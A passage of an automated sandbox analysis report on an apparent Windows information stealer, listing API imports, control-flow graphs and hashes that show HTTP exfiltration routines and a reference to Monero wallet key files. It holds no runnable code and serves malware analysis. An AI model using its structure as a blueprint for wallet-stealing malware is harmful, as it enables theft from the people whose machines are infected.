                          • Instruction Fuzzy Hash: D3F068B1948209EFC710DF98DD49BAEFBBCF745761F10012AFA15A3680C7751504CBA1
                          APIs
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: a6fc06f266b1ee8409c2d0e8d1d1f8fc50607d396417f700ec4fb3c9dd5f8fcf
                          • Instruction ID: 25a7e6f41c209e593967d200ad46108f0cbf07e58a69730014988aa8538b8303
                          • Opcode Fuzzy Hash: a6fc06f266b1ee8409c2d0e8d1d1f8fc50607d396417f700ec4fb3c9dd5f8fcf
                          • Instruction Fuzzy Hash: CCD09E7490431C9BCB04DFE0A94EAEEBB78BB08625F100565D90962240EA315455CA65

                          Control-flow Graph (function at 39f20; graph image not reproduced)
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,00FC5A30), ref: 00039F3D
                          • GetProcAddress.KERNEL32(74DD0000,00FC5850), ref: 00039F55
                          • GetProcAddress.KERNEL32(74DD0000,00FD9688), ref: 00039F6E
                          • GetProcAddress.KERNEL32(74DD0000,00FD9640), ref: 00039F86
                          • GetProcAddress.KERNEL32(74DD0000,00FD96B8), ref: 00039F9E
                          • GetProcAddress.KERNEL32(74DD0000,00FD9658), ref: 00039FB7
                          • GetProcAddress.KERNEL32(74DD0000,00FCB9A0), ref: 00039FCF
                          • GetProcAddress.KERNEL32(74DD0000,00FDD380), ref: 00039FE7
                          • GetProcAddress.KERNEL32(74DD0000,00FDD398), ref: 0003A000
                          • GetProcAddress.KERNEL32(74DD0000,00FDD1B8), ref: 0003A018
                          • GetProcAddress.KERNEL32(74DD0000,00FDD308), ref: 0003A030
                          • GetProcAddress.KERNEL32(74DD0000,00FC5870), ref: 0003A049
                          • GetProcAddress.KERNEL32(74DD0000,00FC5890), ref: 0003A061
                          • GetProcAddress.KERNEL32(74DD0000,00FC58B0), ref: 0003A079
                          • GetProcAddress.KERNEL32(74DD0000,00FC58D0), ref: 0003A092
                          • GetProcAddress.KERNEL32(74DD0000,00FDD368), ref: 0003A0AA
                          • GetProcAddress.KERNEL32(74DD0000,00FDD158), ref: 0003A0C2
                          • GetProcAddress.KERNEL32(74DD0000,00FCB6F8), ref: 0003A0DB
                          • GetProcAddress.KERNEL32(74DD0000,00FC5910), ref: 0003A0F3
                          • GetProcAddress.KERNEL32(74DD0000,00FDD320), ref: 0003A10B
                          • GetProcAddress.KERNEL32(74DD0000,00FDD2C0), ref: 0003A124
                          • GetProcAddress.KERNEL32(74DD0000,00FDD248), ref: 0003A13C
                          • GetProcAddress.KERNEL32(74DD0000,00FDD170), ref: 0003A154
                          • GetProcAddress.KERNEL32(74DD0000,00FC5930), ref: 0003A16D
                          • GetProcAddress.KERNEL32(74DD0000,00FDD2D8), ref: 0003A185
                          • GetProcAddress.KERNEL32(74DD0000,00FDD128), ref: 0003A19D
                          • GetProcAddress.KERNEL32(74DD0000,00FDD2F0), ref: 0003A1B6
                          • GetProcAddress.KERNEL32(74DD0000,00FDD0F8), ref: 0003A1CE
                          • GetProcAddress.KERNEL32(74DD0000,00FDD338), ref: 0003A1E6
                          • GetProcAddress.KERNEL32(74DD0000,00FDD2A8), ref: 0003A1FF
                          • GetProcAddress.KERNEL32(74DD0000,00FDD1A0), ref: 0003A217
                          • GetProcAddress.KERNEL32(74DD0000,00FDD350), ref: 0003A22F
                          • GetProcAddress.KERNEL32(74DD0000,00FDD3C8), ref: 0003A248
                          • GetProcAddress.KERNEL32(74DD0000,00FDA3F0), ref: 0003A260
                          • GetProcAddress.KERNEL32(74DD0000,00FDD3B0), ref: 0003A278
                          • GetProcAddress.KERNEL32(74DD0000,00FDD3E0), ref: 0003A291
                          • GetProcAddress.KERNEL32(74DD0000,00FC5970), ref: 0003A2A9
                          • GetProcAddress.KERNEL32(74DD0000,00FDD1D0), ref: 0003A2C1
                          • GetProcAddress.KERNEL32(74DD0000,00FC59B0), ref: 0003A2DA
                          • GetProcAddress.KERNEL32(74DD0000,00FDD290), ref: 0003A2F2
                          • GetProcAddress.KERNEL32(74DD0000,00FDD1E8), ref: 0003A30A
                          • GetProcAddress.KERNEL32(74DD0000,00FC59D0), ref: 0003A323
                          • GetProcAddress.KERNEL32(74DD0000,00FC5E50), ref: 0003A33B
                          • LoadLibraryA.KERNEL32(00FDD218,?,00035EF3,00040AEB,?,?,?,?,?,?,?,?,?,?,00040AEA,00040AE7), ref: 0003A34D
                          • LoadLibraryA.KERNEL32(00FDD110,?,00035EF3,00040AEB,?,?,?,?,?,?,?,?,?,?,00040AEA,00040AE7), ref: 0003A35E
                          • LoadLibraryA.KERNEL32(00FDD140,?,00035EF3,00040AEB,?,?,?,?,?,?,?,?,?,?,00040AEA,00040AE7), ref: 0003A370
                          • LoadLibraryA.KERNEL32(00FDD188,?,00035EF3,00040AEB,?,?,?,?,?,?,?,?,?,?,00040AEA,00040AE7), ref: 0003A382
                          • LoadLibraryA.KERNEL32(00FDD200,?,00035EF3,00040AEB,?,?,?,?,?,?,?,?,?,?,00040AEA,00040AE7), ref: 0003A393
                          • LoadLibraryA.KERNEL32(00FDD230,?,00035EF3,00040AEB,?,?,?,?,?,?,?,?,?,?,00040AEA,00040AE7), ref: 0003A3A5
                          • LoadLibraryA.KERNEL32(00FDD260,?,00035EF3,00040AEB,?,?,?,?,?,?,?,?,?,?,00040AEA,00040AE7), ref: 0003A3B7
                          • LoadLibraryA.KERNEL32(00FDD278,?,00035EF3,00040AEB,?,?,?,?,?,?,?,?,?,?,00040AEA,00040AE7), ref: 0003A3C8
                          • GetProcAddress.KERNEL32(75290000,00FC5DF0), ref: 0003A3EA
                          • GetProcAddress.KERNEL32(75290000,00FDD3F8), ref: 0003A402
                          • GetProcAddress.KERNEL32(75290000,00FD8F08), ref: 0003A41A
                          • GetProcAddress.KERNEL32(75290000,00FDD4D0), ref: 0003A433
                          • GetProcAddress.KERNEL32(75290000,00FC5AB0), ref: 0003A44B
                          • GetProcAddress.KERNEL32(73540000,00FCB7C0), ref: 0003A470
                          • GetProcAddress.KERNEL32(73540000,00FC5B50), ref: 0003A489
                          • GetProcAddress.KERNEL32(73540000,00FCB658), ref: 0003A4A1
                          • GetProcAddress.KERNEL32(73540000,00FDD428), ref: 0003A4B9
                          • GetProcAddress.KERNEL32(73540000,00FDD440), ref: 0003A4D2
                          • GetProcAddress.KERNEL32(73540000,00FC5AD0), ref: 0003A4EA
                          • GetProcAddress.KERNEL32(73540000,00FC5D70), ref: 0003A502
                          • GetProcAddress.KERNEL32(73540000,00FDD458), ref: 0003A51B
                          • GetProcAddress.KERNEL32(752C0000,00FC5C70), ref: 0003A53C
                          • GetProcAddress.KERNEL32(752C0000,00FC5BF0), ref: 0003A554
                          • GetProcAddress.KERNEL32(752C0000,00FDD518), ref: 0003A56D
                          • GetProcAddress.KERNEL32(752C0000,00FDD470), ref: 0003A585
                          • GetProcAddress.KERNEL32(752C0000,00FC5C30), ref: 0003A59D
                          • GetProcAddress.KERNEL32(74EC0000,00FCB928), ref: 0003A5C3
                          • GetProcAddress.KERNEL32(74EC0000,00FCB810), ref: 0003A5DB
                          • GetProcAddress.KERNEL32(74EC0000,00FDD488), ref: 0003A5F3
                          • GetProcAddress.KERNEL32(74EC0000,00FC5B90), ref: 0003A60C
                          • GetProcAddress.KERNEL32(74EC0000,00FC5E10), ref: 0003A624
                          • GetProcAddress.KERNEL32(74EC0000,00FCBAB8), ref: 0003A63C
                          • GetProcAddress.KERNEL32(75BD0000,00FDD4A0), ref: 0003A662
                          • GetProcAddress.KERNEL32(75BD0000,00FC5D90), ref: 0003A67A
                          • GetProcAddress.KERNEL32(75BD0000,00FD8FE8), ref: 0003A692
                          • GetProcAddress.KERNEL32(75BD0000,00FDD500), ref: 0003A6AB
                          • GetProcAddress.KERNEL32(75BD0000,00FDD4B8), ref: 0003A6C3
                          • GetProcAddress.KERNEL32(75BD0000,00FC5D50), ref: 0003A6DB
                          • GetProcAddress.KERNEL32(75BD0000,00FC5AF0), ref: 0003A6F4
                          • GetProcAddress.KERNEL32(75BD0000,00FDD530), ref: 0003A70C
                          • GetProcAddress.KERNEL32(75BD0000,00FDD4E8), ref: 0003A724
                          • GetProcAddress.KERNEL32(75A70000,00FC5C90), ref: 0003A746
                          • GetProcAddress.KERNEL32(75A70000,00FDD548), ref: 0003A75E
                          • GetProcAddress.KERNEL32(75A70000,00FDD560), ref: 0003A776
                          • GetProcAddress.KERNEL32(75A70000,00FDD578), ref: 0003A78F
                          • GetProcAddress.KERNEL32(75A70000,00FDD410), ref: 0003A7A7
                          • GetProcAddress.KERNEL32(75450000,00FC5D10), ref: 0003A7C8
                          • GetProcAddress.KERNEL32(75450000,00FC5B70), ref: 0003A7E1
                          • GetProcAddress.KERNEL32(75DA0000,00FC5DD0), ref: 0003A802
                          • GetProcAddress.KERNEL32(75DA0000,00FDD590), ref: 0003A81A
                          • GetProcAddress.KERNEL32(6F070000,00FC5DB0), ref: 0003A840
                          • GetProcAddress.KERNEL32(6F070000,00FC5B30), ref: 0003A858
                          • GetProcAddress.KERNEL32(6F070000,00FC5BD0), ref: 0003A870
                          • GetProcAddress.KERNEL32(6F070000,00FDD5A8), ref: 0003A889
                          • GetProcAddress.KERNEL32(6F070000,00FC5B10), ref: 0003A8A1
                          • GetProcAddress.KERNEL32(6F070000,00FC5BB0), ref: 0003A8B9
                          • GetProcAddress.KERNEL32(6F070000,00FC5CB0), ref: 0003A8D2
                          • GetProcAddress.KERNEL32(6F070000,00FC5C10), ref: 0003A8EA
                          • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0003A901
                          • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0003A917
                          • GetProcAddress.KERNEL32(75AF0000,00FDD080), ref: 0003A939
                          • GetProcAddress.KERNEL32(75AF0000,00FD8F48), ref: 0003A951
                          • GetProcAddress.KERNEL32(75AF0000,00FDCF78), ref: 0003A969
                          • GetProcAddress.KERNEL32(75AF0000,00FDCF18), ref: 0003A982
                          • GetProcAddress.KERNEL32(75D90000,00FC5C50), ref: 0003A9A3
                          • GetProcAddress.KERNEL32(6CFD0000,00FDCF60), ref: 0003A9C4
                          • GetProcAddress.KERNEL32(6CFD0000,00FC5CD0), ref: 0003A9DD
                          • GetProcAddress.KERNEL32(6CFD0000,00FDCFD8), ref: 0003A9F5
                          • GetProcAddress.KERNEL32(6CFD0000,00FDD050), ref: 0003AA0D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: HttpQueryInfoA$InternetSetOptionA
                          • API String ID: 2238633743-1775429166
                          • Opcode ID: 730e014adce1b4445b1435a75210a422f8ec2426f81540e96393d74e4706f97a
                          • Instruction ID: 123d602cbc18569c60eeea5bec3660d2a7e76ab6e72229330c0795d79f4d07b9
                          • Opcode Fuzzy Hash: 730e014adce1b4445b1435a75210a422f8ec2426f81540e96393d74e4706f97a
                          • Instruction Fuzzy Hash: B8624DB6618200AFC344DFA8FD8C9767BB9E74D7A1710863AF90AC3270D775A954CB60

                          Control-flow Graph
                          control_flow_graph 801 248d0-24992 call 3aab0 call 24800 call 3aa50 * 5 InternetOpenA StrCmpCA 816 24994 801->816 817 2499b-2499f 801->817 816->817 818 249a5-24b1d call 38cf0 call 3ac30 call 3abb0 call 3ab10 * 2 call 3acc0 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3ac30 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3acc0 call 3ac30 call 3abb0 call 3ab10 * 2 InternetConnectA 817->818 819 24f1b-24f43 InternetCloseHandle call 3ade0 call 2a210 817->819 818->819 905 24b23-24b27 818->905 829 24f82-24ff2 call 38b20 * 2 call 3aab0 call 3ab10 * 8 819->829 830 24f45-24f7d call 3ab30 call 3acc0 call 3abb0 call 3ab10 819->830 830->829 906 24b35 905->906 907 24b29-24b33 905->907 908 24b3f-24b72 HttpOpenRequestA 906->908 907->908 909 24b78-24e78 call 3acc0 call 3abb0 call 3ab10 call 3ac30 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3ac30 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3ac30 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3acc0 call 3abb0 call 3ab10 call 3ac30 call 3abb0 call 3ab10 call 3aa50 call 3ac30 * 2 call 3abb0 call 3ab10 * 2 call 3ade0 lstrlen call 3ade0 * 2 lstrlen call 3ade0 HttpSendRequestA 908->909 910 24f0e-24f15 InternetCloseHandle 908->910 1021 24e82-24eac InternetReadFile 909->1021 910->819 1022 24eb7-24f09 InternetCloseHandle call 3ab10 1021->1022 1023 24eae-24eb5 1021->1023 1022->910 1023->1022 1024 24eb9-24ef7 call 3acc0 call 3abb0 call 3ab10 1023->1024 1024->1021
                          APIs
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                            • Part of subcall function 00024800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00024889
                            • Part of subcall function 00024800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00024899
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00024965
                          • StrCmpCA.SHLWAPI(?,00FDEA68), ref: 0002498A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00024B0A
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00040DDE,00000000,?,?,00000000,?,",00000000,?,00FDE968), ref: 00024E38
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00024E54
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00024E68
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00024E99
                          • InternetCloseHandle.WININET(00000000), ref: 00024EFD
                          • InternetCloseHandle.WININET(00000000), ref: 00024F15
                          • HttpOpenRequestA.WININET(00000000,00FDEA48,?,00FDE068,00000000,00000000,00400100,00000000), ref: 00024B65
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                          • InternetCloseHandle.WININET(00000000), ref: 00024F1F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 460715078-2180234286
                          • Opcode ID: a73b832d06c9f6309557b1e1fc98d07666c327f953b540bcbd3ee4c93e3b343c
                          • Instruction ID: f6333d199e89c5ca1d2de601edac341490b6a7be56b3530de3043d310f225eae
                          • Opcode Fuzzy Hash: a73b832d06c9f6309557b1e1fc98d07666c327f953b540bcbd3ee4c93e3b343c
                          • Instruction Fuzzy Hash: 1C12DC72A10118AACB16EB90DDA6FEEB37DAF15300F1045A9F14666093DF706F48CF66

                          Control-flow Graph
                          control_flow_graph 1090 35760-357c7 call 35d20 call 3ab30 * 3 call 3aa50 * 4 1106 357cc-357d3 1090->1106 1107 35827-3589c call 3aa50 * 2 call 21590 call 35510 call 3abb0 call 3ab10 call 3ade0 StrCmpCA 1106->1107 1108 357d5-35806 call 3ab30 call 3aab0 call 21590 call 35440 1106->1108 1133 358e3-358f9 call 3ade0 StrCmpCA 1107->1133 1137 3589e-358de call 3aab0 call 21590 call 35440 call 3abb0 call 3ab10 1107->1137 1124 3580b-35822 call 3abb0 call 3ab10 1108->1124 1124->1133 1140 358ff-35906 1133->1140 1141 35a2c-35a94 call 3abb0 call 3ab30 * 2 call 216b0 call 3ab10 * 4 call 21670 call 21550 1133->1141 1137->1133 1144 35a2a-35aaf call 3ade0 StrCmpCA 1140->1144 1145 3590c-35913 1140->1145 1272 35d13-35d16 1141->1272 1165 35be1-35c49 call 3abb0 call 3ab30 * 2 call 216b0 call 3ab10 * 4 call 21670 call 21550 1144->1165 1166 35ab5-35abc 1144->1166 1146 35915-35969 call 3ab30 call 3aab0 call 21590 call 35440 call 3abb0 call 3ab10 1145->1146 1147 3596e-359e3 call 3aa50 * 2 call 21590 call 35510 call 3abb0 call 3ab10 call 3ade0 StrCmpCA 1145->1147 1146->1144 1147->1144 1250 359e5-35a25 call 3aab0 call 21590 call 35440 call 3abb0 call 3ab10 1147->1250 1165->1272 1167 35ac2-35ac9 1166->1167 1168 35bdf-35c64 call 3ade0 StrCmpCA 1166->1168 1174 35b23-35b98 call 3aa50 * 2 call 21590 call 35510 call 3abb0 call 3ab10 call 3ade0 StrCmpCA 1167->1174 1175 35acb-35b1e call 3ab30 call 3aab0 call 21590 call 35440 call 3abb0 call 3ab10 1167->1175 1197 35c66-35c71 Sleep 1168->1197 1198 35c78-35ce1 call 3abb0 call 3ab30 * 2 call 216b0 call 3ab10 * 4 call 21670 call 21550 1168->1198 1174->1168 1276 35b9a-35bda call 3aab0 call 21590 call 35440 call 3abb0 call 3ab10 1174->1276 1175->1168 1197->1106 1198->1272 1250->1144 1276->1168
                          APIs
                            • Part of subcall function 0003AB30: lstrlen.KERNEL32(00024F55,?,?,00024F55,00040DDF), ref: 0003AB3B
                            • Part of subcall function 0003AB30: lstrcpy.KERNEL32(00040DDF,00000000), ref: 0003AB95
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00035894
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000358F1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00035AA7
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                            • Part of subcall function 00035440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00035478
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 00035510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00035568
                            • Part of subcall function 00035510: lstrlen.KERNEL32(00000000), ref: 0003557F
                            • Part of subcall function 00035510: StrStrA.SHLWAPI(00000000,00000000), ref: 000355B4
                            • Part of subcall function 00035510: lstrlen.KERNEL32(00000000), ref: 000355D3
                            • Part of subcall function 00035510: lstrlen.KERNEL32(00000000), ref: 000355FE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000359DB
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00035B90
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00035C5C
                          • Sleep.KERNEL32(0000EA60), ref: 00035C6B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: 3338d793dee8c092c1b555f5ceebc0516a2232dfaada433a50714068661ff2c1
                          • Instruction ID: 0ea55180d0893321010985f48f5537175df18ed589473db46605c74b9e8cc481
                          • Opcode Fuzzy Hash: 3338d793dee8c092c1b555f5ceebc0516a2232dfaada433a50714068661ff2c1
                          • Instruction Fuzzy Hash: FFE12172A105049ACB15FBA0ED66EFDB37DAF55340F408568B547660A3EF346B08CBA2

                          Control-flow Graph
                          control_flow_graph 1301 319f0-31a1d call 3ade0 StrCmpCA 1304 31a27-31a41 call 3ade0 1301->1304 1305 31a1f-31a21 ExitProcess 1301->1305 1309 31a44-31a48 1304->1309 1310 31c12-31c1d call 3ab10 1309->1310 1311 31a4e-31a61 1309->1311 1313 31a67-31a6a 1311->1313 1314 31bee-31c0d 1311->1314 1316 31b63-31b74 StrCmpCA 1313->1316 1317 31b82-31b93 StrCmpCA 1313->1317 1318 31b41-31b52 StrCmpCA 1313->1318 1319 31ba1-31bb2 StrCmpCA 1313->1319 1320 31bc0-31bd1 StrCmpCA 1313->1320 1321 31a85-31a94 call 3ab30 1313->1321 1322 31acf-31ae0 StrCmpCA 1313->1322 1323 31aad-31abe StrCmpCA 1313->1323 1324 31a71-31a80 call 3ab30 1313->1324 1325 31a99-31aa8 call 3ab30 1313->1325 1326 31b1f-31b30 StrCmpCA 1313->1326 1327 31bdf-31be9 call 3ab30 1313->1327 1328 31afd-31b0e StrCmpCA 1313->1328 1314->1309 1343 31b80 1316->1343 1344 31b76-31b79 1316->1344 1345 31b95-31b98 1317->1345 1346 31b9f 1317->1346 1341 31b54-31b57 1318->1341 1342 31b5e 1318->1342 1347 31bb4-31bb7 1319->1347 1348 31bbe 1319->1348 1350 31bd3-31bd6 1320->1350 1351 31bdd 1320->1351 1321->1314 1335 31ae2-31aec 1322->1335 1336 31aee-31af1 1322->1336 1333 31ac0-31ac3 1323->1333 1334 31aca 1323->1334 1324->1314 1325->1314 1339 31b32-31b35 1326->1339 1340 31b3c 1326->1340 1327->1314 1337 31b10-31b13 1328->1337 1338 31b1a 1328->1338 1333->1334 1334->1314 1354 31af8 1335->1354 1336->1354 1337->1338 1338->1314 1339->1340 1340->1314 1341->1342 1342->1314 1343->1314 1344->1343 1345->1346 1346->1314 1347->1348 1348->1314 1350->1351 1351->1314 1354->1314
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 00031A15
                          • ExitProcess.KERNEL32 ref: 00031A21
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 6ef9b4374f7292cb361970c82a30fd171d40d3cb6a142377bd80d9ab4cb22276
                          • Instruction ID: e910e64d94162038da0e00db0db0c115ac1eea3bc9bba0c29c5c4d95210ff092
                          • Opcode Fuzzy Hash: 6ef9b4374f7292cb361970c82a30fd171d40d3cb6a142377bd80d9ab4cb22276
                          • Instruction Fuzzy Hash: 90516174B08209EFDB15DFA4E944AEEB7BDEF48344F104058E902AB241E770E954CB61

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FD2248), ref: 00039BF1
